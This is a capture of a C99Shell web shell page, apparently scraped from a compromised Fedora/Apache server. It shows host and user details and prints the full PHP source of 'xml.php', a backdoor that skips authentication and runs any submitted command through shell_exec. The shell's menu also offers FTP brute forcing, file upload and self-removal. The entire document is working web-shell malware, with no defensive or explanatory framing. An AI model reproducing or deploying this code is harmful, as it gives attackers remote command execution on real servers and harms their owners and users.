!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4 

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t 

Safe-mode: OFF (not secure)

/home/mnnews/public_html/mina/manage/fajlovi/   drwxrwxrwx
Free 3.83 GB of 27.03 GB (14.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     xml.php (4.67 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php // -*- coding: utf-8 -*-
define('PHPSHELL_VERSION', 'v8');
$passwd = array('admin' => 'dodol');

  $authenticated = true;

header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
?>
<html>
<head>
<title>Backdoor Created By NotHacker</title>
</head>
<body>
<h1>NotHacker Shell Backdoor<?php echo PHPSHELL_VERSION ?></h1>
<?php if (!$authenticated) { ?>
<p>You failed to authenticate yourself to PhpShell. You can <a
href="phpshell.php">reload</a> to try again.</p>
</body>
</html>

<?php exit; } //' <- fix syntax highlight... ?>

<?php

error_reporting (E_ALL);

$work_dir = empty($_REQUEST['work_dir']) ? '' : $_REQUEST['work_dir'];
$command  = empty($_REQUEST['command'])  ? '' : $_REQUEST['command'];
$stderr   = empty($_REQUEST['stderr'])   ? '' : $_REQUEST['stderr'];

/* First we check if there has been asked for a working directory. */
if ($work_dir != '') {
  /* A workdir has been asked for */
  if ($command != '') {
    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
      /* We try and match a cd command. */
      if ($regs[1][0] == '/') {
        $new_dir = $regs[1]; // 'cd /something/...'
      } else {
        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
      }
      if (file_exists($new_dir) && is_dir($new_dir)) {
        $work_dir = $new_dir;
      }
      $command = '';
    }
  }
}

if ($work_dir != '' && file_exists($work_dir) && is_dir($work_dir)) {
  /* We change directory to that dir: */
  chdir($work_dir);
}

/* We now update $work_dir to avoid things like '/foo/../bar': */
$work_dir = exec('pwd');

?>

<form action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
<fieldset><legend>Input</legend>
<p>Current working directory: <b>
<?php

$work_dir_splitted = explode('/', substr($work_dir, 1));

echo '<a href="' . $_SERVER['PHP_SELF'] . '?work_dir=/">Root</a>/';

if (!empty($work_dir_splitted[0])) {
  $path = '';
  for ($i = 0; $i < count($work_dir_splitted); $i++) {
    $path .= '/' . $work_dir_splitted[$i];
    printf('<a href="%s?work_dir=%s">%s</a>/',
           $_SERVER['PHP_SELF'],
           urlencode($path),
           $work_dir_splitted[$i]);
  }
}

?></b></p>
<p>Choose new working directory:
<select name="work_dir" onchange="this.form.submit()">
<?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
  if (is_dir($dir)) {
    if ($dir == '.') {
      echo "<option value=\"$work_dir\" selected=\"selected\">Current Directory</option>\n";
    } elseif ($dir == '..') {
      /* We have found the parent dir. We must be carefull if the
       * parent directory is the root directory (/). */
      if (strlen($work_dir) == 1) {
    /* work_dir is only 1 charecter - it can only be / There's no
         * parent directory then. */
      } elseif (strrpos($work_dir, '/') == 0) {
    /* The last / in work_dir were the first charecter.  This
         * means that we have a top-level directory eg. /bin or /home
         * etc... */
      echo "<option value=\"/\">Parent Directory</option>\n";
      } else {
      /* We do a little bit of string-manipulation to find the parent
       * directory... Trust me - it works :-) */
      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
      }
    } else {
      if ($work_dir == '/') {
    echo "<option value=\"$work_dir$dir\">$dir</option>\n";
      } else {
    echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
      }
    }
  }
}
closedir($dir_handle);

?>

</select></p>

<p>Command: <input type="text" name="command" size="60" /></p>


<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"
<?php if ($stderr) echo "checked=\"checked\""; ?> /> <input name="submit_btn" type="submit" value="Execute Command" /></p>
</fieldset>

<fieldset><legend>Output</legend>

<p><textarea cols="80" rows="20" readonly="readonly">
<?php
if (!empty($command)) {
  if ($stderr) {
    $tmpfile = tempnam('/tmp', 'phpshell');
    $command .= " 1> $tmpfile 2>&1; cat $tmpfile; rm $tmpfile";
  } elseif ($command == 'ls') {
    /* ls looks much better with ' -F', IMHO. */
    $command .= ' -F';
  }
  echo htmlspecialchars(shell_exec($command), ENT_COMPAT, 'UTF-8');
}
?>
</textarea></p>

</fieldset>
</form>

<script type="text/javascript">
document.forms[0].command.focus();
</script>

<hr />

<address>Copyright &copy; 2006&ndash;2007, <a
href="mailto:iam@blackzone.net.id"> by i am Not Hacker</a>.</address>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0032 ]--